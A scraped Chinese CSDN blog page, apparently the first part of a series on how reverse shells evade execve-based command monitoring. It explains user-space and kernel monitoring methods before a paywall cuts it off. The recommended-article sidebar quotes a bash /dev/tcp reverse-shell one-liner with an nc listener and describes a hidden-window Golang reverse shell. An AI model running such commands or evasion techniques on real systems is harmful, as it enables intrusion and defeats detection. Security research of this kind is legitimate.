linux环境下模拟实现命令解释器_反弹shell逃逸基于execve的命令监控(上)

最新推荐文章于 2023-07-22 23:16:28 发布
最新推荐文章于 2023-07-22 23:16:28 发布
阅读量286 收藏 1
点赞数
文章标签: linux环境下模拟实现命令解释器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39623271/article/details/111667723
版权
本文探讨了在Linux环境中如何监控和绕过基于execve的shell命令监控,包括用户态和内核态监控方法,如Netlink Connector、Audit和Hook execve syscall。同时介绍了如何通过Patch Shell解释器监控内置命令,以及已知的对抗策略,如无日志绕过和假日志混淆。文章展示了如何通过编写shellcode和利用ptrace系统调用来避免使用execve系统调用,从而实现反弹shell的逃逸。
摘要由CSDN通过智能技术生成

微信公众号:七夜安全博客 关注信息安全技术、关注 系统底层原理。问题或建议,请公众号留言。

一.前言

本篇聊一聊 新的主题:《反弹shell-逃逸基于execve的命令监控》,打算写一个专题,预估可以写三篇,内容确实有点多,也是最近研究了一些有意思的东西,想给大家分享一下。喜欢的话,请大家一定点在看,并分享出去,算是对我原创最大的支持了。

二.Shell命令监控

在linux中,大家用的比较多的是shell命令,同样在渗透到linux服务器,植入木马后,探测信息,执行恶意操作,维持权限,横向移动,shell命令也是必不可少的。既然在攻击侧,shell命令如此重要,那在安全防御方面,shell命令的监控也是非常关键的检测维度。各大厂商,一般怎么监控shell命令的调用呢?

2.1 基于execve的shell命令监控

系统命令,其实就是一个个程序,执行起来也就是一个个进程。命令执行的监控,也就是对外部进程创建的监控。在linux中,启动外部进程,是通过execve系统调用进行创建的,我们使用strace 打印一下在bash中启动ls的系统调用,第一句就是通过execve启动ls。

e0c6c25939dbc6b5bee6122803a35862.png

但是我们在开发linux程序的时候,执行系统命令,并没有直接使用execve系统调用,这是因为libc/glibc库对execve系统调用封装成了函数,方便我们调用。

因此基于execve的系统命令监控方式,分成了用户态和内核态。用户态通过劫持libc/glibc的exec相关函数来实现,内核态则通过系统自身组件或者劫持execve syscall 来实现。

1.用户态

在libc/glibc中,对execve syscall 进行了一系列的封装,简称exec族函数。exec系列函数调用时,启动新进程,替换掉当前进程。即程序不会再返回到原进程,具体内容如下:

int execl(constchar*path,constchar*arg0,...,(char*)0);

int execlp(constchar*file,constchar*arg0,...,(char*)0);

int execle(constchar*path,constchar*arg0,...,(char*)0,char*const envp[]);

int execv(cosnt char*path,char*const argv[]);

int execvp(cosnt char*file,char*const argv[]);

int execve(cosnt char*path,char*const argv[],char*const envp[]);

怎么劫持libc/glibc中的函数,我就不扩展了,大家google一下 so preload 劫持

2.内核态

在内核态监控其实是最准确,而且是最难绕过的。在内核态,一般是通过三种办法来监控:

  1. Netlink Connector

  2. Audit

  3. Hook execve syscall

(1)  Netlink Connector

在介绍 Netlink Connector 之前,首先了解一下 Netlink 是什么,Netlink 是一个套接字家族(socket family),它被用于内核与用户态进程以及用户态进程之间的 IPC 通信,ss命令就是通过 Netlink 与内核通信获取的信息。

Netlink Connector 是一种 Netlink ,它的 Netlink 协议号是NETLINK_CONNECTOR,其代码位于:

https://githu

最低0.47元/天 解锁文章
weixin_39623271
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反弹shell监控或bash监控bypass手段
SHELLCODE_8BIT的博客
02-02 178
【代码】反弹shell监控或bash监控bypass手段。
shell 封装方法_Linux Shell编程编程入门:从第一个Shell脚本开始吧
weixin_40000457的博客
01-29 1650
Shell不仅是一种命令解释器,还是一种编程语言,非常擅长处理文本类型的数据。由于Linux系统中的所有配置文件都是纯文本的,所以shell编程语言在Linux系统使用中发挥了巨大的作用。使用shell编写的程序类似于DOS下的批处理程序,简单来说,shell编程就是对一系列Linux命令的逻辑化处理。例如,我们在进行自动化测试的时候,需要将代码部署到服务器进行管理和集成,每次都要执行拉取最新的代...
利用Falco监控反弹Shell
YJ_12340的博客
08-26 337
本文利用Falco进行了反弹Shell监控,虽然大多数的反弹行为都可以被监控到,但是可能存在各种各样的误报、漏报,安全任重道远。
使用msf监听模块接收反弹shell
-
05-23 2211
msf
基于C语言在 Linux 环境模拟实现命令解释器【100012493】
05-31
在本项目中,你将利用C语言在Linux环境模拟实现一个命令解释器。这个命令解释器的主要任务是接收用户输入的命令,解析这些命令,并执行相应的操作系统调用。以下是涉及的关键知识点: 1. **C语言编程**:作为基础...
Linux环境模拟实现命令解释器--操作系统大作业--程序设计说明书
06-17
Linux环境模拟实现命令解释器是一项挑战性的操作系统大作业,旨在深入理解操作系统的运作机制以及命令行接口(CLI)的工作原理。在这个项目中,学生需要编写一个程序,该程序能够接收用户输入的命令,解析这些...
linux环境模拟实现简单命令解释器C++
01-12
Linux环境下,使用C++编写一个简单的命令解释器是一个典型的系统编程任务,它涉及到对操作系统接口的直接调用,特别是文件系统操作。这个项目的主要目标是实现类似shell的功能,允许用户执行基本的文件管理和系统...
Linux环境模拟实现命令解释器
04-07
Linux环境模拟实现命令解释器是一项复杂而富有挑战性的任务,它涉及到对操作系统内核、shell脚本语言的理解以及程序设计技巧。以下是一些相关的知识点: 1. **命令解释器的作用**:命令解释器,也被称为shell,...
Linux低权限模糊化执行的程序名和参数,避开基于execve系统调用监控命令日志.zip
最新发布
04-29
本资料包“Linux低权限模糊化执行的程序名和参数,避开基于execve系统调用监控命令日志.zip”可能包含了如何在较低权限环境实现这一目标的技术和方法。 首先,我们需要理解execve系统调用的工作原理。execve是...
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like this: 10.1.1.1:1234 This golag file requires go-pop3 lib which you can get it here: https://github.com/taknb2nch/go-pop3.git If you want to hide the window when executing it, compile the program like this: go build -ldflags -H=windowsgui email_reverse_shell-repl.go
OSSEC HIDS 功能有日志分析
01-02
OSSEC HIDS的主要功能有日志分析、完整性检查、rootkit检测、基于时间的警报和主动响应。除了具有入侵检测系统功能外,它还一般被用在SEM/SIM(安全事件管理(SEM: Security Event Management)/安全信息管理(SIM:Security Information Management))解决方案中。因其强大的日志分析引擎,ISP(Internet service provider)(网络服务提供商)、大学和数据中心用其监控和分析他们的防火墙、入侵检测系统、网页服务和验证等产生的日志。
封装 Shell 脚本
yangzex的专栏
08-29 1610
对包含原生代码的应用进行调试和性能剖析时,一些需要在进程启动时便启用的调试工具通常很有用。这要求您以全新的进程来运行应用,而不是从 zygote 克隆。
DevOps自动化平台开发之 Shell脚本执行的封装
Coder_Boy_的博客
07-22 829
本篇介绍如何使用Java封装Linux命令Shell脚本的使用。将其设计成spring boot starter。基于如下技术栈开发DevOps平台。运行测试 shell 脚本。运行测试Linux命令
反弹shell方法
Sea_Sand息禅
04-06 809
1、bash反弹shell kali ip:192.168.10.130 目标机上执行命令:bash -i >& /dev/tcp/192.168.10.130/8888 0>&1 kali机执行命令:nc -lvp 8888 bash -i:在本地打开一个bash终端 linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 0...
常用的封装方法
wuyou1336的博客
07-29 515
1.字符序列转换为16进制字符串   private String bytesToHexString(byte[] src) { StringBuilder stringBuilder = new StringBuilder("0x"); if (src == null || src.length <= 0) { return null;
渗透linux不能执行命令,渗透技巧——如何逃逸Linux的受限制shell执行任意命令
weixin_29974217的博客
05-08 529
0x01 前言今早在刷twitter的时候看到了一篇文章(https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf?rss),介绍了如何在受限制的shell中执行任意命令,实现交互。其相应的利用场景是说当我们通过一些手段拿到当前Linux机器的shell时,由于当前shell的限制,很...
execv shell_linux 调用shell命令
weixin_39791653的博客
12-20 569
C程序调用shell脚本共同拥有三种法子 :system()、popen()、exec系列数call_exec1.c,system() 不用你自己去产生进程。它已经封装了,直接增加自己的命令exec 须要你自己 fork 进程,然后exec 自己的命令popen() 也能够实现运行你的命令,比system 开销小方法一、system()的使用。我直接上代码吧int system(const ch...
【入侵检测】驭龙系统Windows下面部署
qq_33163943的博客
10-06 1461
巡风系统和驭龙系统都是国人开发非常优秀的开源产品 经过几天的折磨在Windows和Linux 下面都完成部署 Linux 建议dockers 一键部署 比较方便 我的是Debian 驭龙能完美运行 驭龙系统需要部署的软件 Windows下面部署需要的软件  elasticsearch-5.6.8【5.X可能不支持6.X】 MongoDB【建议用3.X以上】 Go语言编译器 【自动检测...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值